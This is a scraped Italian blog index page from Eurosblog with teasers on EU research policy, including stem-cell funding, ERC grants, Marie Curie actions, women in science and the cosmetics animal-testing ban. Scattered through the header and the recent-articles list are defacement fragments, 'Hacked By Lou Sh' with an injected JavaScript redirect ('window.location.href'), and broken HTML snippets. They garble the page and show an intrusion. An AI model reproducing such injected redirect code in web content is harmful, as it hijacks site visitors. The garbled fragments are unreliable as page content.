EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Ricerca

ricerca e università


it

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

it

Lo scorso 28 maggio la Commissione europea ha bocciato l’iniziativa dei cittadini europei “Uno di noi” che chiedeva di sospendere i finanziamenti a favore di attività che prevedono la distruzione degli embrioni umani per ciò che riguarda la ricerca, gli aiuti allo sviluppo e la salute pubblica.

La Commissione ha analizzato la richiesta giunta dai promotori della campagna ed ha deciso di non avanzare una proposta legislativa spiegando che la ricerca sulle cellule staminali è l’unica metodologia che può condurre a salvare vite.

La Commissione ha perciò deliberato che continuerà a (...)

it

Il 14 gennaio 2014 il Parlamento europeo ha reso noto, attraverso un comunicato, il finanziamento di importanti progetti di ricerca. In un momento in cui il progresso scientifico è minato dalle politiche di austerity che molti Stati europei stanno adottando per fronteggiare la crisi, l’UE sceglie di schierarsi al fianco dei ricercatori, stanziando a loro favore un totale di 575 milioni di euro, con un contributo medio assegnato di 1.84 milioni di euro fino a un massimo di 2.75 milioni di euro.

Nell’ ambito della prima competizione Consolidator Grant (un bando di concorso per l’assegnazione di fondi riservato a ricercatori con un ampio bagaglio di esperienza), il Consiglio Europeo della ricerca ha selezionato le proposte di 312 scienziati, i quali potranno continuare e migliorare i loro (...)

it

Lo scorso 9 aprile si è tenuto a Bruxelles l'incontro “L'Europa per la Città della Scienza – idee, proposte e strategie per la ricostruzione”.

L’evento fortemente voluto dai Vicepresidenti del Parlamento europeo Roberta Angelilli e Gianni Pittella, è stato presieduto anche dal Vicepresidente della Commissione Ue Antonio Tajani, da Maire Geoghegan Quinn, commissario per la Ricerca e da Johannes Hahn, commissario per le Politiche (...)

it

Facilitare la libera circolazione di idee, favorire lo scambio interculturale: questo è la volontà dell'UE, rendere il Vecchio continente parte del mondo, libero dalle costrizioni burocratiche.

La proposta è stata avanzata dalla commissaria europea Cecilia Malmström, la quale il 25 marzo scorso, accompagnata dai ricercatori ospiti dell’UE, Fatma Abdi e Bellarminus Kakpovi, ha esposto i vantaggi di una apertura di mentalità da parte dei paesi dell’UE. Un’apertura che deve riguardare in (...)

it

Di tutti i ricercatori europei, le persone di sesso femminile rappresentano soltanto il 33%, cioè soltanto uno su tre. Questa percentuale in realtà è in aumento, il che rende ancora meglio l'idea dell'arretratezza del nostro continente rispetto agli altri. La cifre si abbassano ancora di più se si osservano i dati riguardanti il numero di professoresse impiegate ordinariamente (20% rispetto agli uomini) e di donne che gestiscono le istituzioni nell'ambito dell'istruzione superiore, soltanto il 15,5%. E' chiaro che dati come questi non possono che far preoccupare: il sessismo in ambito lavorativo sembra ancora essere presente e ricompare prepotentemente dinanzi a notizie come questa.

La Commissaria europea per la ricerca, la scienza e l’innovazione, Máire Geoghegan-Quinn, ha espresso il proprio dissenso verso questi risultati: "Nonostante alcuni progressi negli ultimi anni, le donne nel campo della ricerca rimangono una minoranza, ed è come se una barriera invisibile (...)

it

Il progetto RARE-Bestpractices ha l’obiettivo di approfondire gli studi e trovare una cura alle malattie rare attraverso una serie di esperimenti ed esempi pratici.

La volontà è quella di creare delle procedure standard affidabili, capaci di marcare le linee guida alle quali si dovranno attenere i futuri ricercatori . Il RARE-Bestpractices vuole dunque affinare la ricerca, senza però ampliare il grande distacco che già sussiste tra laboratorio e pratica negli (...)

it

Il neuroscienziato israeliano Henry Markram ha annunciato che, grazie alla costruzione del primo cervello digitale al mondo, verranno acquisite molte nuove informazioni sui disturbi mentali.

Il neuroscienziato israeliano Henry Markram, che dal maggio 2005 lavora insieme all’IBM ad un progetto chiamato Blue Brain, ha annunciato che, grazie alla costruzione del primo cervello digitale al mondo, verranno acquisite molte nuove informazioni sui disturbi mentali. Il progetto mira a (...)

it

Gli interessati hanno tempo fino al 14 agosto 2013 per presentare la loro richiesta. Il numero dei partecipanti è abbastanza esiguo come era lecito attendersi: saranno solo 1000 i ricercatori che avranno l'opportunità di sfruttare l'ingente sovvenzione fornita dall'Unione europea. Oltre a questo, la Commissione ha specificato che continuerà ad offrire comunque borse di studio individuali nell'ambito delle nuove azioni Marie Skłodowska-Curie, inserite nel programma Horizon 2020, che vedrà la luce il prossimo anno, il 2014.

Le "Azioni Marie Curie" sono delle sovvenzioni istituite già da qualche anno che mirano ad ampliare e specificare i percorsi di screening dei ricercatori. Le cifre promosse dall’attività sono molto consistenti, anche se mai come questa volta la Commissione si era spinta tanto oltre: dal 2007 al (...)

it

Da lunedì 11 marzo è scattato in tutti i Paesi dell’Unione Europea il divieto per la produzione e la vendita di prodotti cosmetici testati sugli animali.

È la tappa conclusiva di un iter legislativo durato molti anni. Già nel settembre del 2004, un regolamento proibiva di testare sugli animali i prodotti finiti. Poi nel marzo del 2009 l’ultimatum fissato tramite un regolamento che imponeva di porre fine anche alla sperimentazione del singolo (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France